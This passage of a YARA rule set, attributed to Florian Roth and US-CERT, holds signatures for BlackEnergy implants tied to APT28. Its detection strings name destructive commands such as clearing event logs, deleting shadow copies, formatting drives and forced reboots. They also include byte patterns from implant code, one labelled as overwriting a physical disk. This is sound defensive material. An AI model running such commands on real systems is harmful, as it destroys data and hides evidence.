00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04} $b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 02 00 3F 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 00 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 6F 00 6C 00 69 00 64 00 20 00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 73 00 00 00 00 00 62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 30 00 08 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 41 00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00 00 00 00 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58} $b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 } $b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40 B0 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 00 72 00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D 00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 42 00 0D 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04} $b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00 77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00 31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00 73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00 42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04} $b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and (uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in (uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16))))))) } */ /* Yara Rule Set Author: Florian Roth Date: 2017-02-12 Identifier: Grizzly Steppe Alternatives */ /* Alternative Rule Set ---------------------------------------------------- */ rule IMPLANT_4_v3_AlternativeRule { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" comment = "Alternative rule - not based on the original samples but samples on which the original rule matched" author = "Florian Roth" reference = "US CERT Grizzly Steppe Report" date = "2017-02-12" hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a" strings: $op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 } /* Opcode */ $op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and all of them ) } /* Alternative Rule Set ---------------------------------------------------- */ rule IMPLANT_4_v4 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $DK_format1 = "/c format %c: /Y /Q" ascii $DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii $DK_physicaldrive = "PhysicalDrive%d" wide $DK_shutdown = "shutdown /r /t %d" condition: uint16(0) == 0x5A4D and all of ($DK*) } rule IMPLANT_4_v5 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $GEN_HASH = {0F BE C9 C1 C0 07 33 C1} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } /* TOO MANY FALSE POSITIVES rule IMPLANT_4_v6 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = "DispatchCommand" wide ascii $STR2 = "DispatchEvent" wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } */ rule IMPLANT_4_v7 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C} $sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C} $sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} $sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C} $sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C} $sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C} $sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} $sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C} $sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C} $sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 3 of them } rule IMPLANT_4_v8 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18} $f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC} $f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68 65 6C 54 FF 57} $a1 = {83 EC 04 60 E9 1E 01 00 00} condition: $a1 at pe.entry_point or any of ($f*) } rule IMPLANT_4_v9 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $a = "wevtutil clear-log" ascii wide nocase $b = "vssadmin delete shadows" ascii wide nocase $c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase $d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase //$e = {57 55 33 c9 51 8b c3 99 57 52 50} $openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 } $f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0} condition: ($a and $b) or $c or $d or ($openPhysicalDiskOverwriteWithZeros and $f) } rule IMPLANT_4_v10 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $ ={A1B05C72} $ ={EB3D0384} $ ={6F45594E} $ ={71815A4E} $ ={D5B03E72} $ ={6B43594E} $ ={F572993D} $ ={665D9DC0} $ ={0BE7A75A} $ ={F37443C5} $ ={A2A474BB} $ ={97DEEC67} $ ={7E0CB078} $ ={9C9678BF} $ ={4A37A149} $ ={8667416B} $ ={0A375BA4} $ ={DC505A8D} $ ={02F1F808} $ ={2C819712} condition: uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550 and 15 of them } rule IMPLANT_4_v11 { meta: description = "BlackEnergy / Voodoo Bear Implant 